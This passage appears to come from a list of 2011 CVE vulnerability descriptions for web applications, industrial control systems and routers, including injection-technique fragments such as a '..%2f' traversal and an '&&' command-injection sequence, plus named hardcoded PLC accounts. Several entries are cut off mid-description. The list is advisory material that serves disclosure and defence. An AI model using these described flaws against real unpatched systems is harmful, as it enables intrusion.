remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the search program, a different vulnerability than CVE-2011-3986. [CVE-2011-5019] Cross-site scripting (XSS) vulnerability in setup/index.php in Textpattern CMS 4.4.1, when the product is incompletely installed, allows remote attackers to inject arbitrary web script or HTML via the ddb parameter. [CVE-2011-5009] The CmpWebServer.dll module in the Control service in 3S CoDeSys 3.4 SP4 Patch 2 allows remote attackers to cause a denial of service (NULL pointer dereference) via (1) a crafted Content-Length in an HTTP POST or (2) an invalid HTTP request method. [CVE-2011-5007] Stack-based buffer overflow in the CmpWebServer component in 3S CoDeSys 3.4 SP4 Patch 2 and earlier, as used on the ABB AC500 PLC and possibly other products, allows remote attackers to execute arbitrary code via a long URI to TCP port 8080. [CVE-2011-4969] Cross-site scripting (XSS) vulnerability in jQuery before 1.6.3, when using location.hash to select elements, allows remote attackers to inject arbitrary web script or HTML via a crafted tag. [CVE-2011-4962] code/sitefeatures/PageCommentInterface.php in SilverStripe 2.4.x before 2.4.6 might allow remote attackers to execute arbitrary code via a crafted cookie in a user comment submission, which is not properly handled when it is deserialized. [CVE-2011-4956] Cross-site scripting (XSS) vulnerability in WordPress before 3.1.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4951] Open redirect vulnerability in phpgwapi/ntlm/index.php in EGroupware Enterprise Line (EPL) before 11.1.20110804-1 and EGroupware Community Edition before 1.8.001.20110805 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter. [CVE-2011-4950] Cross-site scripting (XSS) vulnerability in phpgwapi/js/jscalendar/test.php in EGroupware Enterprise Line (EPL) before 11.1.20110804-1 and EGroupware Community Edition before 1.8.001.20110805 allows remote attackers to inject arbitrary web script or HTML via the lang parameter. [CVE-2011-4942] Multiple cross-site scripting (XSS) vulnerabilities in admin/configuration.php in Geeklog before 1.7.1sr1 allow remote attackers to inject arbitrary web script or HTML via the (1) subgroup or (2) conf_group parameters. NOTE: this vulnerability might require a user-assisted attack or a bypass of a CSRF protection mechanism. [CVE-2011-4928] Cross-site scripting (XSS) vulnerability in the textile formatter in Redmine before 1.0.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4926] Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2011-4923] Cross-site scripting (XSS) vulnerability in View.pm in BackupPC 3.0.0, 3.1.0, 3.2.0, 3.2.1, and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the num parameter in a view action to index.cgi, related to the log file viewer, a different vulnerability than CVE-2011-3361. [CVE-2011-4920] Multiple cross-site scripting (XSS) vulnerabilities in e107 0.7.26, and other versions before 1.0.0, allow remote attackers to inject arbitrary web script or HTML via the URL to (1) e107_images/thumb.php or (2) rate.php, (3) resend_name parameter to e107_admin/users.php, and (4) link BBCode in user signatures. [CVE-2011-4918] Multiple cross-site scripting (XSS) vulnerabilities in Elxis CMS 2009.2, 2009.3 and 2009.3 Aphrodite before revision 2684 allow remote attackers to inject arbitrary web script or HTML via the (1) task parameter to elxis/index.php, and (2) PATH_INFO to elxis/administrator/index.php. [CVE-2011-4910] Cross-site scripting (XSS) vulnerability in Joomla! before 1.5.12 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2011-4909] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.5.12 allow remote attackers to inject arbitrary web script or HTML via the HTTP_REFERER header to (1) components/com_content/views/article/tmpl/form.php, (2) components/com_user/controller.php, (3) plugins/system/legacy/html.php, or (4) templates/beez/html/com_content/article/form.php. [CVE-2011-4883] The web server in Certec atvise webMI2ADS (aka webMI) before 2.0.2 does not properly validate values in HTTP requests, which allows remote attackers to cause a denial of service (resource consumption) via a crafted request. [CVE-2011-4882] The web server in Certec atvise webMI2ADS (aka webMI) before 2.0.2 allows remote attackers to cause a denial of service (application exit) via an unspecified command in an HTTP request. [CVE-2011-4881] The web server in Certec atvise webMI2ADS (aka webMI) before 2.0.2 does not properly check return values from functions, which allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted HTTP request. [CVE-2011-4880] Directory traversal vulnerability in the web server in Certec atvise webMI2ADS (aka webMI) before 2.0.2 allows remote attackers to read arbitrary files via a crafted HTTP request. [CVE-2011-4879] miniweb.exe in the HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3 [CVE-2011-4878] Directory traversal vulnerability in miniweb.exe in the HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3 [CVE-2011-4859] The Schneider Electric Quantum Ethernet Module, as used in the Quantum 140NOE771 and 140CPU65* modules, the Premium TSXETY* and TSXP57* modules, the M340 BMXNOE01* and BMXP3420* modules, and the STB DIO STBNIC2212 and STBNIP2* modules, uses hardcoded passwords for the (1) AUTCSE, (2) AUT_CSE, (3) fdrusers, (4) ftpuser, (5) loader, (6) nic2212, (7) nimrohs2212, (8) nip2212, (9) noe77111_v500, (10) ntpupdate, (11) pcfactory, (12) sysdiag, (13) target, (14) test, (15) USER, and (16) webserver accounts, which makes it easier for remote attackers to obtain access via the (a) TELNET, (b) Windriver Debug, or (c) FTP port. [CVE-2011-4853] The Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 includes an RFC 1918 IP address within a web page, which allows remote attackers to obtain potentially sensitive information by reading this page, as demonstrated by smb/user/list-data/items-per-page/ and certain other files. [CVE-2011-4852] The Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 generates web pages containing external links in response to GET requests with query strings for enterprise/mobile-monitor/ and certain other files, which makes it easier for remote attackers to obtain sensitive information by reading (1) web-server access logs or (2) web-server Referer logs, related to a "cross-domain Referer leakage" issue. [CVE-2011-4831] Directory traversal vulnerability in webFileBrowser.php in Web File Browser 0.4b14 allows remote authenticated users to read arbitrary files via a ..%2f (encoded dot dot) in the file parameter in a download action. [CVE-2011-4830] Multiple cross-site scripting (XSS) vulnerabilities in the com_listing component in Barter Sites component 1.3 for Joomla! allow remote authenticated users to inject arbitrary web script or HTML via the (1) listing_title, (2) description, (3) homeurl (aka Website Address), (4) paystring (aka Payment types accepted), (5) sell_price, (6) shipping_cost, and (7) quantity parameters to index.php. [CVE-2011-4827] Multiple cross-site scripting (XSS) vulnerabilities in AutoSec Tools V-CMS 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) p parameter to redirect.php and (2) box parameter to includes/TrueColorPicker/index.php, which is not properly handled in includes/TrueColorPicker/class.TrueColorPicker.php. [CVE-2011-4822] Multiple cross-site scripting (XSS) vulnerabilities in the user profile feature in Atlassian FishEye before 2.5.5 allow remote attackers to inject arbitrary web script or HTML via (1) snippets in a user comment, which is not properly handled in a Confluence page, or (2) the user profile display name, which is not properly handled in a FishEye page. [CVE-2011-4819] Multiple cross-site scripting (XSS) vulnerabilities in IBM Maximo Asset Management and Asset Management Essentials 6.2, 7.1, and 7.5 allow remote attackers to inject arbitrary web script or HTML via the uisesionid parameter to (1) maximo.jsp or (2) the default URI under ui/. [CVE-2011-4818] Open redirect vulnerability in IBM Maximo Asset Management and Asset Management Essentials 6.2, 7.1, and 7.5 allows remote authenticated users to redirect users to arbitrary web sites and conduct phishing attacks via the uisessionid parameter to an unspecified component. [CVE-2011-4814] Multiple cross-site scripting (XSS) vulnerabilities in Dolibarr 3.1.0 RC and probably earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) admin/boxes.php, (3) comm/clients.php, (4) commande/index.php [CVE-2011-4812] Cross-site scripting (XSS) vulnerability in nowosci.php in BestShopPro allows remote attackers to inject arbitrary web script or HTML via the str parameter. [CVE-2011-4809] Multiple cross-site scripting (XSS) vulnerabilities in the HM Community (com_hmcommunity) component before 1.01 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) language[], (2) university[], (3) persent[], (4) company_name[], (5) designation[], (6) music[], (7) books[], (8) movies[], (9) games[], (10) syp[], (11) ft[], and (12) fa[] parameters in a save task for a profile to index.php. NOTE: some of these details are obtained from third party information. [CVE-2011-4806] Multiple cross-site scripting (XSS) vulnerabilities in main.php in phpAlbum 0.4.1.16 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) var1 and (2) keyword parameters. [CVE-2011-4805] Cross-site scripting (XSS) vulnerability in pubDBLogon.jsp in SAP Crystal Report Server 2008 allows remote attackers to inject arbitrary web script or HTML via the service parameter. [CVE-2011-4801] SQL injection vulnerability in akeyActivationLogin.do in Authenex Web Management Control in Authenex Strong Authentication System (ASAS) Server 3.1.0.2 and 3.1.0.3 allows remote attackers to execute arbitrary SQL commands via the username parameter. [CVE-2011-4785] Directory traversal vulnerability in the HP-ChaiSOE/1.0 web server on the HP LaserJet P3015 printer with firmware before 07.080.3, LaserJet 4650 printer with firmware 07.006.0, and LaserJet 2430 printer with firmware 08.113.0_I35128 allows remote attackers to read arbitrary files via unspecified vectors, a different vulnerability than CVE-2008-4419. [CVE-2011-4780] Multiple cross-site scripting (XSS) vulnerabilities in libraries/display_export.lib.php in phpMyAdmin 3.4.x before 3.4.9 allow remote attackers to inject arbitrary web script or HTML via crafted URL parameters, related to the export panels in the (1) server, (2) database, and (3) table sections. [CVE-2011-4778] Cross-site scripting (XSS) vulnerability in Splunk Web in Splunk 4.2.x before 4.2.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka SPL-44614. [CVE-2011-4777] Cross-site scripting (XSS) vulnerability in the Site Editor (aka SiteBuilder) feature in Parallels Plesk Panel 10.4.4_build20111103.18 allows remote attackers to inject arbitrary web script or HTML via the login parameter to preferences.html. [CVE-2011-4776] Multiple cross-site scripting (XSS) vulnerabilities in the Control Panel in Parallels Plesk Panel 10.4.4_build20111103.18 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by admin/update/settings/ and certain other files. [CVE-2011-4767] The Site Editor (aka SiteBuilder) feature in Parallels Plesk Small Business Panel 10.2.0 has web pages containing e-mail addresses that are not intended for correspondence about the local application deployment, which allows remote attackers to obtain potentially sensitive information by reading a page, as demonstrated by js/Wizard/Status.js and certain other files. [CVE-2011-4764] Multiple cross-site scripting (XSS) vulnerabilities in the Site Editor (aka SiteBuilder) feature in Parallels Plesk Small Business Panel 10.2.0 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by Wizard/Edit/Modules/Image and certain other files. [CVE-2011-4760] Parallels Plesk Small Business Panel 10.2.0 has web pages containing e-mail addresses that are not intended for correspondence about the local application deployment, which allows remote attackers to obtain potentially sensitive information by reading a page, as demonstrated by smb/email-address/list and certain other files. [CVE-2011-4759] Parallels Plesk Small Business Panel 10.2.0 generates web pages containing external links in response to GET requests with query strings for client@1/domain@1/hosting/file-manager/ and certain other files, which makes it easier for remote attackers to obtain sensitive information by reading (1) web-server access logs or (2) web-server Referer logs, related to a "cross-domain Referer leakage" issue. [CVE-2011-4754] Multiple cross-site scripting (XSS) vulnerabilities in Parallels Plesk Small Business Panel 10.2.0 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by smb/app/available/id/apscatalog/ and certain other files. [CVE-2011-4751] SmarterTools SmarterStats 6.2.4100 generates web pages containing external links in response to GET requests with query strings for frmGettingStarted.aspx, which makes it easier for remote attackers to obtain sensitive information by reading (1) web-server access logs or (2) web-server Referer logs, related to a "cross-domain Referer leakage" issue. [CVE-2011-4750] Multiple cross-site scripting (XSS) vulnerabilities in SmarterTools SmarterStats 6.2.4100 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by Default.aspx and certain other files. [CVE-2011-4748] The billing system for Parallels Plesk Panel 10.3.1_build1013110726.09 has web pages containing e-mail addresses that are not intended for correspondence about the local application deployment, which allows remote attackers to obtain potentially sensitive information by reading a page, as demonstrated by js/ajax/core/ajax.inc.js and certain other files. [CVE-2011-4745] Multiple cross-site scripting (XSS) vulnerabilities in the billing system for Parallels Plesk Panel 10.3.1_build1013110726.09 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by admin/index.php/default and certain other files. [CVE-2011-4742] The Control Panel in Parallels Plesk Panel 10.2.0 build 20110407.20 has web pages containing e-mail addresses that are not intended for correspondence about the local application deployment, which allows remote attackers to obtain potentially sensitive information by reading a page, as demonstrated by smb/user/list and certain other files. [CVE-2011-4741] The Control Panel in Parallels Plesk Panel 10.2.0 build 20110407.20 includes a database connection string within a web page, which allows remote attackers to obtain potentially sensitive information by reading this page, as demonstrated by client@2/domain@1/hosting/aspdotnet/. [CVE-2011-4740] The Control Panel in Parallels Plesk Panel 10.2.0 build 20110407.20 generates web pages containing external links in response to GET requests with query strings for smb/app/search-data/catalogId/marketplace and certain other files, which makes it easier for remote attackers to obtain sensitive information by reading (1) web-server access logs or (2) web-server Referer logs, related to a "cross-domain Referer leakage" issue. [CVE-2011-4735] Multiple cross-site scripting (XSS) vulnerabilities in the Control Panel in Parallels Plesk Panel 10.2.0 build 20110407.20 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by smb/user/create and certain other files. [CVE-2011-4731] The Server Administration Panel in Parallels Plesk Panel 10.2.0_build1011110331.18 includes an RFC 1918 IP address within a web page, which allows remote attackers to obtain potentially sensitive information by reading this page, as demonstrated by admin/home/admin and certain other files. [CVE-2011-4726] Multiple cross-site scripting (XSS) vulnerabilities in the Server Administration Panel in Parallels Plesk Panel 10.2.0_build1011110331.18 allow remote attackers to inject arbitrary web script or HTML via crafted input to a PHP script, as demonstrated by admin/health/ and certain other files. [CVE-2011-4718] Session fixation vulnerability in the Sessions subsystem in PHP before 5.5.2 allows remote attackers to hijack web sessions by specifying a session ID. [CVE-2011-4712] Directory traversal vulnerability in Oxide WebServer allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in an HTTP request. [CVE-2011-4709] Multiple cross-site scripting (XSS) vulnerabilities in Hotaru.php in the Search plugin 1.3 for Hotaru CMS allow remote attackers to inject arbitrary web script or HTML via the (1) SITE_NAME parameter to admin_index.php, or the (2) return and (3) search parameters to index.php. NOTE: some of these details are obtained from third party information. [CVE-2011-4708] Cross-site scripting (XSS) vulnerability in IBM Rational Asset Manager before 7.5.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4692] WebKit, as used in Apple Safari 5.1.1 and earlier and Google Chrome 15 and earlier, does not prevent capture of data about the time required for image loading, which makes it easier for remote attackers to determine whether an image exists in the browser cache via crafted JavaScript code, as demonstrated by visipisi. [CVE-2011-4687] Opera before 11.60 allows remote attackers to cause a denial of service (CPU and memory consumption) via unspecified content on a web page, as demonstrated by a page under the cisco.com home page. [CVE-2011-4686] Unspecified vulnerability in the Web Workers implementation in Opera before 11.60 allows remote attackers to cause a denial of service (application crash) via unknown vectors. [CVE-2011-4685] Dragonfly in Opera before 11.60 allows remote attackers to cause a denial of service (application crash) via unspecified content on a web page, as demonstrated by forbes.com. [CVE-2011-4682] The JavaScript engine in Opera before 11.60 does not properly implement the in operator, which allows remote attackers to bypass the Same Origin Policy via vectors related to variables on different web sites. [CVE-2011-4680] Multiple cross-site scripting (XSS) vulnerabilities in the customer portal in vtiger CRM before 5.2.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4670] Multiple cross-site scripting (XSS) vulnerabilities in vTiger CRM 5.2.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) viewname parameter in a CalendarAjax action, (2) activity_mode parameter in a DetailView action, (3) contact_id and (4) parent_id parameters in an EditView action, (5) day, (6) month, (7) subtab, (8) view, and (9) viewOption parameters in the index action, and (10) start parameter in the ListView action to the Calendar module [CVE-2011-4647] Multiple cross-site scripting (XSS) vulnerabilities in the story creation feature in Geeklog 1.8.0 allow remote attackers to inject arbitrary web script or HTML via the (1) code or (2) raw BBcode tags. [CVE-2011-4643] Multiple directory traversal vulnerabilities in Splunk 4.x before 4.2.5 allow remote authenticated users to read arbitrary files via a .. (dot dot) in a URI to (1) Splunk Web or (2) the Splunkd HTTP Server, aka SPL-45243. [CVE-2011-4642] mappy.py in Splunk Web in Splunk 4.2.x before 4.2.5 does not properly restrict use of the mappy command to access Python classes, which allows remote authenticated administrators to execute arbitrary code by leveraging the sys module in a request to the search application, as demonstrated by a cross-site request forgery (CSRF) attack, aka SPL-45172. [CVE-2011-4640] Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action. [CVE-2011-4639] The (1) Traceroute and (2) Ping implementations in tools.php in SpamTitan WebTitan before 3.60 allow remote authenticated users to execute arbitrary commands via shell metacharacters in an argument, as demonstrated by an && (ampersand ampersand) sequence. [CVE-2011-4638] Multiple SQL injection vulnerabilities in SpamTitan WebTitan before 3.60 allow remote attackers to execute arbitrary SQL commands via (1) the username parameter to login-x.php, and allow remote authenticated users to execute arbitrary SQL commands via the (2) bldomain, (3) wldomain, or (4) temid parameter to urls-x.php. [CVE-2011-4634] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.4.x before 3.4.8 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted database name, related to the Database Synchronize panel [CVE-2011-4618] Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2011-4616] Cross-site scripting (XSS) vulnerability in the HTML-Template-Pro module before 0.9507 for Perl allows remote attackers to inject arbitrary web script or HTML via template parameters, related to improper handling of > (greater than) and < (less than) characters. [CVE-2011-4615] Multiple cross-site scripting (XSS) vulnerabilities in Zabbix before 1.8.10 allow remote attackers to inject arbitrary web script or HTML via the gname parameter (aka host groups name) to (1) hostgroups.php and (2) usergrps.php, the update action to (3) hosts.php and (4) scripts.php, and (5) maintenance.php. [CVE-2011-4605] The (1) JNDI service, (2) HA-JNDI service, and (3) HAJNDIFactory invoker servlet in JBoss Enterprise Application Platform 4.3.0 CP10 and 5.1.2, Web Platform 5.1.2, SOA Platform 4.2.0.CP05 and 4.3.0.CP05, Portal Platform 4.3 CP07 and 5.2.x before 5.2.2, and BRMS Platform before 5.3.0 do not properly restrict write access, which allows remote attackers to add, delete, or modify items in a JNDI tree via unspecified vectors. [CVE-2011-4593] Moodle 1.9.x before 1.9.15, 2.0.x before 2.0.6, and 2.1.x before 2.1.3 does not properly handle user/action_redir group messages, which allows remote authenticated users to discover e-mail addresses by visiting the messaging interface. [CVE-2011-4591] Cross-site scripting (XSS) vulnerability in the print_object function in lib/datalib.php in Moodle 2.0.x before 2.0.6 and 2.1.x before 2.1.3, when a developer debugging script is enabled, allows remote attackers to inject arbitrary web script or HTML via vectors involving object states. [CVE-2011-4590] The web services implementation in Moodle 2.0.x before 2.0.6 and 2.1.x before 2.1.3 does not properly consider the maintenance-mode state and account attributes during login attempts, which allows remote authenticated users to bypass intended access restrictions by connecting to a webservice server. [CVE-2011-4583] Moodle 2.0.x before 2.0.6 and 2.1.x before 2.1.3 displays web service tokens associated with (1) disabled services and (2) users who no longer have authorization, which allows remote authenticated users to have an unspecified impact by reading these tokens. [CVE-2011-4582] Open redirect vulnerability in the Calendar set page in Moodle 2.1.x before 2.1.3 allows remote authenticated users to redirect users to arbitrary web sites and conduct phishing attacks via a redirection URL. [CVE-2011-4581] mod/wiki/pagelib.php in Moodle 2.0.x before 2.0.6 and 2.1.x before 2.1.3 allows remote authenticated users to discover the username of a wiki creator by visiting the history and deletion user interface. [CVE-2011-4575] Cross-site scripting (XSS) vulnerability in the JMX console in JBoss Enterprise Application Platform (EAP) 5.2.0, Web Platform (EWP) 5.2.0, and BRMS Platform before 5.3.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4572] Cross-site scripting (XSS) vulnerability in inc/tesmodrewite.php in CF Image Hosting Script 1.3.82, 1.4.1, and probably other versions before 1.4.2 allows remote attackers to inject arbitrary web script or HTML via the q parameter. NOTE: this was originally reported as a file disclosure vulnerability, but this is likely inaccurate. [CVE-2011-4568] Cross-site scripting (XSS) vulnerability in view/frontend-head.php in the Flowplayer plugin before 1.2.12 for WordPress allows remote attackers to inject arbitrary web script or HTML via the URI. [CVE-2011-4567] Cross-site scripting (XSS) vulnerability in includes/templates/template_default/templates/tpl_gv_send_default.php in Zen Cart before 1.5 allows remote attackers to inject arbitrary web script or HTML via the message parameter in a gv_send action to index.php, a different vulnerability than CVE-2011-4547. [CVE-2011-4565] Multiple cross-site scripting (XSS) vulnerabilities in XOOPS 2.5.1.a, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to include/formdhtmltextarea_preview.php or (2) img BBCODE tag within the message parameter to pmlite.php (aka Private Message). NOTE: some of these details are obtained from third party information. [CVE-2011-4564] Cross-site scripting (XSS) vulnerability in the admin script in Active CMS 1.2 allows remote attackers to inject arbitrary web script or HTML via the mod parameter in a module action. [CVE-2011-4563] Cross-site scripting (XSS) vulnerability in index.php in JAKCMS 2.0.4.1, and possibly other versions before 2.2.6 2011-09-23, allows remote attackers to inject arbitrary web script or HTML via the userpost parameter in a PM request, related to tinymce. NOTE: some of these details are obtained from third party information. [CVE-2011-4562] Multiple cross-site scripting (XSS) vulnerabilities in (1) view/admin/log_item.php and (2) view/admin/log_item_details.php in the Redirection plugin 2.2.9 for WordPress allow remote attackers to inject arbitrary web script or HTML via the Referer HTTP header in a request to a post that does not exist. [CVE-2011-4561] Cross-site scripting (XSS) vulnerability in admin.php in Phorum 5.2.18 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/index.php. NOTE: some of these details are obtained from third party information. [CVE-2011-4560] Cross-site scripting (XSS) vulnerability in the Petition Node module 6.x-1.x before 6.x-1.5 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors related to signing a petition. [CVE-2011-4553] Multiple open redirect vulnerabilities in One Click Orgs before 1.2.3 allow (1) remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the return_to parameter, and allow (2) remote authenticated users to redirect users to arbitrary web sites and conduct phishing attacks via crafted characters in the domain name of a subdomain. [CVE-2011-4552] Multiple cross-site scripting (XSS) vulnerabilities in One Click Orgs before 1.2.3 allow remote attackers to inject arbitrary web script or HTML via the description field of (1) a new vote or (2) the eject member proposal feature. [CVE-2011-4551] Cross-site scripting (XSS) vulnerability in tiki-cookie-jar.php in TikiWiki CMS/Groupware before 8.2 and LTS before 6.5 allows remote attackers to inject arbitrary web script or HTML via arbitrary parameters. [CVE-2011-4547] Multiple cross-site scripting (XSS) vulnerabilities in includes/templates/template_default/common/tpl_header_test_info.php in Zen Cart 1.3.9h, when debugging is enabled, might allow remote attackers to inject arbitrary web script or HTML via the (1) main_page parameter or (2) PATH_INFO, a different vulnerability than CVE-2011-4567. [CVE-2011-4544] Multiple cross-site scripting (XSS) vulnerabilities in Prestashop before 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) address or (2) relativ_base_dir parameter to modules/mondialrelay/googlemap.php [CVE-2011-4541] Cross-site scripting (XSS) vulnerability in index.php in Hastymail2 2.1.1 before RC2 allows remote attackers to inject arbitrary web script or HTML via the rs parameter in a mailbox Drafts action. [CVE-2011-4540] Multiple cross-site scripting (XSS) vulnerabilities in AtMail Open (aka AtMail Open-Source edition) 1.04 allow remote attackers to inject arbitrary web script or HTML via the func parameter to (1) ldap.php or (2) search.php. [CVE-2011-4532] Absolute path traversal vulnerability in the ALMListView.ALMListCtrl ActiveX control in almaxcx.dll in the graphical user interface in Siemens Automation License Manager (ALM) 2.0 through 5.1+SP1+Upd2 allows remote attackers to overwrite arbitrary files via the Save method. [CVE-2011-4526] Buffer overflow in an ActiveX control in Advantech/BroadWin WebAccess before 7.0 might allow remote attackers to execute arbitrary code via a long string value in unspecified parameters. [CVE-2011-4525] Advantech/BroadWin WebAccess before 7.0 allows remote attackers to trigger the extraction of arbitrary web content into a batch file on a client system, and execute this batch file, via unspecified vectors. [CVE-2011-4524] Buffer overflow in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via a long string value in unspecified parameters. [CVE-2011-4523] Cross-site scripting (XSS) vulnerability in bwview.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2011-4522] Cross-site scripting (XSS) vulnerability in bwerrdn.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2011-4521] SQL injection vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary SQL commands via crafted string input. [CVE-2011-4520] Heap-based buffer overflow in an ActiveX component in MICROSYS PROMOTIC before 8.1.5 allows remote attackers to cause a denial of service via a crafted web page. [CVE-2011-4519] Stack-based buffer overflow in an ActiveX component in MICROSYS PROMOTIC before 8.1.5 allows remote attackers to cause a denial of service via a crafted web page. [CVE-2011-4518] Directory traversal vulnerability in the PmWebDir object in the web server in MICROSYS PROMOTIC before 8.1.5 allows remote attackers to read arbitrary files via unspecified vectors. [CVE-2011-4515] Siemens WinCC (TIA Portal) 11 uses a reversible algorithm for storing HMI web-application passwords in world-readable and world-writable files, which allows local users to obtain sensitive information by leveraging (1) physical access or (2) Sm@rt Server access. [CVE-2011-4512] CRLF injection vulnerability in the HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3 [CVE-2011-4511] Cross-site scripting (XSS) vulnerability in the HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3 [CVE-2011-4510] Cross-site scripting (XSS) vulnerability in the HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3 [CVE-2011-4509] The HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 [CVE-2011-4508] The HMI web server in Siemens WinCC flexible 2004, 2005, 2007, and 2008 before SP3 [CVE-2011-4506] The UPnP IGD implementation on the Thomson (aka Technicolor) TG585 with firmware 7.x before 7.4.3.2 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. [CVE-2011-4505] The UPnP IGD implementation on SpeedTouch 5x6 devices with firmware before 6.2.29 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. [CVE-2011-4504] The UPnP IGD implementation in the Pseudo ICS UPnP software on the ZyXEL P-330W allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. [CVE-2011-4503] The UPnP IGD implementation in Broadcom Linux on the Sitecom WL-111 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. [CVE-2011-4501] The UPnP IGD implementation in Edimax EdiLinux on the Edimax BR-6104K with firmware before 3.25, Edimax 6114Wg, Canyon-Tech CN-WF512 with firmware 1.83, Canyon-Tech CN-WF514 with firmware 2.08, Sitecom WL-153 with firmware before 1.39, and Sweex LB000021 with firmware 3.15 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. [CVE-2011-4499] The UPnP IGD implementation in the Broadcom UPnP stack on the Cisco Linksys WRT54G with firmware before 4.30.5, WRT54GS v1 through v3 with firmware before 4.71.1, and WRT54GS v4 with firmware before 1.06.1 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. [CVE-2011-4498] Cross-site request forgery (CSRF) vulnerability in the web console in Zenprise Device Manager 6.x through 6.1.8 allows remote attackers to hijack the authentication of administrators for requests that wipe mobile devices. [CVE-2011-4465] Cross-site scripting (XSS) vulnerability in IBM Lotus Mobile Connect (LMC) 6.1.4 allows remote attackers to inject arbitrary web script or HTML via vectors related to a hidden redirect URL. [CVE-2011-4447] The "encrypt wallet" feature in wxBitcoin and bitcoind 0.4.x before 0.4.1, and 0.5.0rc, does not properly interact with the deletion functionality of BSDDB, which allows context-dependent attackers to obtain unencrypted private keys from Bitcoin wallet files by bypassing the BSDDB interface and reading entries that are marked for deletion. [CVE-2011-4435] The web-server component in the Consolidation and Analysis Engine (CAE) Server in DB2 Query Monitor in IBM DB2 Tools 2.3.0 for z/OS does not prevent directory browsing, which allows remote attackers to obtain sensitive information via HTTP requests. [CVE-2011-4368] Cross-site scripting (XSS) vulnerability in Remote Development Services (RDS) in Adobe ColdFusion 8.0 through 9.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4345] Cross-site scripting (XSS) vulnerability in Namazu before 2.0.21, when Internet Explorer 6 or 7 is used, allows remote attackers to inject arbitrary web script or HTML via a cookie. [CVE-2011-4344] Cross-site scripting (XSS) vulnerability in Jenkins Core in CloudBees Jenkins before 1.438, and 1.409 LTS before 1.409.3 LTS, when a stand-alone container is used, allows remote attackers to inject arbitrary web script or HTML via vectors related to error messages. [CVE-2011-4340] Multiple cross-site scripting (XSS) vulnerabilities in Symphony CMS 2.2.3 and possibly other versions before 2.2.4 allow remote authenticated users with Author privileges to inject arbitrary web script or HTML via (1) the profile parameter to extensions/profiledevkit/content/content.profile.php, as demonstrated via requests to (a) the default URI, (b) about/, or (c) drafts/ [CVE-2011-4335] Multiple cross-site scripting (XSS) vulnerabilities in Contao before 2.10.2 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php in a (1) teachers.html or (2) teachers/ action. [CVE-2011-4332] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! 1.6.3 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-4329] 